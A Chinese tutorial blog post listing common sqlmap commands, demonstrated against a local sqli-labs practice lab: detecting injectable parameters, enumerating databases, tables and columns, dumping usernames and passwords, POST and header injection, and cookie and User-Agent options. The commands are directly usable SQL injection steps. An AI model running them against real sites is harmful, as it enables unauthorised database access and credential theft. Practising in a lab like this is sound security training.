sqlmap一些常用命令

仅供交流学习使用,请勿用于非法用途

python 复制代码
1)检测url存在漏洞情况:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1"
2)获取所有数据库名称:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --dbs
3)获取指定库的所有表名:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --tables -D security
4)获取当前数据库名是什么:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --current-db
5)获取指定库指定表的所有字段:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --columns -D security -T users
6)!!!禁止使用!!!拖库:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" -C id,password,username  -D security -T users --dump

以上为本地测试,请勿用于非法用途

环境,phpstudy搭建的sqli-labs

补充:

python 复制代码
7)多参数时指定参数:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1&page=1" -p page
	或者:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1&page=1" -p page --batch
	其中 --batch 是自动化测试,需要选择,全部默认Y(注入过程可能比较久)
8)批量检测:python sqlmap.py -m C:\Users\Administrator\Desktop\url.txt
9)设置cookie(检测需要登录的url):python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --cookie "cookie内容" --dbs
10)随机使用一个User-agent头部,或者指定一个User-agent头部: 随机: --random-agent
	指定:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --user-agent="User-agent头部" --dbs

以上是get方式

以下是post方式

补充:

python 复制代码
post注入(其他内容获取都一样):python sqlmap.py -r C:\Users\Administrator\Desktop\2.txt -p uname --dbs

2.txt文件内容:

xml 复制代码
POST /sqli-labs-master/Less-11/ HTTP/1.1
Host: 192.168.88.128
User-Agent: 等等等
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://192.168.88.128
Connection: close
Referer: http://192.168.88.128/sqli-labs-master/Less-11/
Upgrade-Insecure-Requests: 1

uname=aaa&passwd=bbb&submit=Submit

此文件是burpsuite拦截的,至于怎么保存这个文件自己查询或者直接复制都是可以的

补充:

head头注入:可以是cookie或者User-Agent

python 复制代码
head头注入:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-20/" --cookie "uname=Dumb" --level 2 --dbs

--level:指定测试等级

相关推荐
mooyuan天天1 天前
CISP-PTE SQL注入关卡渗透实战(手注法+sqlmap法)
sql注入·sqlmap·sql注入漏洞·ctf-pte
mooyuan天天3 天前
CTF-PTE SQL注入9(两种方法渗透:手注法+脚本法)
cisp-pte·sqlmap·sql注入漏洞·万能注入
mooyuan天天6 天前
CISP-PTE SQL注入3(两种方法渗透:手注法+sqlmap法)
cisp-pte·sql注入·sqlmap·sql注入漏洞
QuantumRedGuestk6 天前
Xss-Labs靶场通关详细教程【文图】
靶场·xss·xss-labs·web渗透
mooyuan天天7 天前
CISP-PTE SQL注入8(万能密码+sqlmap脚本 共5种方法)
cisp-pte·sql注入·sqlmap·sql注入漏洞·万能密码
mooyuan天天11 天前
CISP-PTE SQL注入2(两种方法渗透:手注+sqlmap)
cisp-pte·sql注入·sqlmap·sql注入漏洞
0DayHP14 天前
HTB:MonitorsFour[WriteUP]
网络安全·内网渗透·web渗透
0DayHP20 天前
HTB:Eighteen[WriteUP]
网络安全·内网渗透·web渗透
tmj0124 天前
Sqlmap命令详解
web安全·sqlmap
合天网安实验室1 个月前
2025铸剑杯线下赛AI安全渗透复现
ctf·web渗透·ai安全·大模型安全·2025铸剑杯